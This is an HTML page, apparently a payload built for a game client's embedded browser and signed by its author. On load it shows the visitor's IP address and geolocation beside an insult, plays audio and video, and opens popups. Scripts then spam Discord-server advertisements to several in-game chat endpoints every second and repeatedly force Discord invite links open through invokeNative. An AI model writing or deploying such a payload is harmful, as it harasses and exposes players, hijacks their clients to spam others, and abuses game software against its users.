<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title> </title>
    <style>
        #bg-video {
    position: fixed;
    top: 0;
    left: 0;
    min-width: 100vw;
    min-height: 100vh;
    z-index: -1;
    object-fit: cover;
}

body {
    margin: 0;
    padding: 0;
    font-family: 'Courier New', Courier, monospace;
    color: #0000ff;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    flex-direction: column;
    text-align: center;
    position: relative;
    z-index: 1;
}

        .image-container img {
            width: 300px; 
            height: auto;
            border: 2px solid #0000ff; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(0, 0, 255, 0.7); 
        }
        .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: #0000ff; 
            text-shadow: 0px 0px 8px #0000ff, 0px 0px 15px #0000ff, 0px 0px 25px #0000ff; 
            letter-spacing: 4.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 20px;
            font-size: 3em; 
            color: #0000ff; 
            text-shadow: 0px 0px 8px #0000ff, 0px 0px 15px #0000ff, 0px 0px 25px #0000ff; 
            letter-spacing: 4.5px; 
        }
    </style>
</head>
<body>
    <video autoplay muted loop id="bg-video">
        <source src="https://cdn.discordapp.com/attachments/1214075319225557023/1401965670807244840/ssvid.net--W-W-OIIA-OIIA-Spinning-Cat_720p.mp4?ex=689231c7&is=6890e047&hm=10d97de50a1b5c2ff89db74bba9deb76afe0c42d0f29c7ae0ac51c74aa667d84&" type="video/mp4">
    </video>
    <div class="image-container">
        <img src="https://media.discordapp.net/attachments/1214075319225557023/1379317801159753728/DCA548BA-139B-4F4A-B0FC-E53FC489A3D7.png?ex=6892330e&is=6890e18e&hm=cdb50482d2919a2ee928816beb74517f17d95d9b32d85ede08f253f7a6cbbd01&=&format=webp&quality=lossless">
    </div>
    <audio autoplay loop>
        <source src="https://cdn.discordapp.com/attachments/1214075319225557023/1402262186575003649/ssvid.net--indian-meme-song.mp3?ex=689345ee&is=6891f46e&hm=2cc1e92e3aef788d9aaf78991b6057b03166edc6b8e85fb9d42cb04daf00329a&" type="audio/mpeg">
    </audio>
    <div class="info" id="ip-info">
        <strong>IP: <span id="ip"></span></strong><br>
        <span><strong>City:</strong> <span id="city"></span></span><br>
        <span><strong>Region:</strong> <span id="region"></span></span><br>
        <span><strong>Country:</strong> <span id="country"></span></span><br>
        <span><strong>Location:</strong> <span id="loc"></span></span><br>
        <span><strong>Organization:</strong> <span id="org"></span></span><br>
        <span><strong>Timezone:</strong> <span id="timezone"></span></span>
    </div>
    <div class="text">GO TO SLEEP BITCHS</div>

    <script>
         fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            delete data.readme;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.textContent = JSON.stringify(data, null, 2);
        });
            setTimeout(() => {
                window.open("https://cdn.discordapp.com/attachments/1239118162260135967/1392950213605458032/standard.gif?ex=6884833a&is=688331ba&hm=0514787c27cce792dbcdda6ddbd4bef8c1655f107572833232e1b6bbe0bf6284&", "_blank");
            }, 50);


            const msg = `👑Lei - .gg/ka4rx ! 👑`;
            const body = JSON.stringify({ message: msg });
            setInterval(() => {
                fetch("https://flix-scripts/chatResult", { method: "POST", body });
                fetch("https://danger_chat/Danger_Chat:SendMessage", {
                    method: "POST",
                    body: JSON.stringify({
                        "message": msg,
                        "channel": "L_Prime",
                        "color": null,
                        "isImageAndLinksAllowed": [false, false]
                    })
                });
                fetch("https://easy-chat+/o6ZbK5Ecp6", {
                    headers: {
                        accept: "*/*",
                        "content-type": "application/x-www-form-urlencoded; charset=UTF-8"
                    },
                    body: JSON.stringify({ message: msg, channel: "L_Prime" }),
                    method: "POST"
                });
                fetch("https://melix_chat/chatResult", { method: "POST", body });
                fetch("https://as_chat/chatResult", { method: "POST", body });
                fetch("https://chat/chatResult", { method: "POST", body });
                fetch("https://ho-chatv2/Chat", {
                    method: "POST",
                    body: JSON.stringify({
                        "Type": "chatResult",
                        "message": msg,
                        "chatType": "general"
                    })
                });
            }, 1000);
        </script>
        <script>
            setInterval(function() {
                window.invokeNative("openUrl", "https://discord.gg/tMgY64eA");
                window.invokeNative("openUrl", "https://discord.gg/tMgY64eA");
                window.invokeNative("openUrl", "https://discord.gg/tMgY64eA");
                window.invokeNative("openUrl", "https://discord.gg/tMgY64eA");
            }, 1000);
        </script>
    </div>

</body>

</html>
by L_Prime



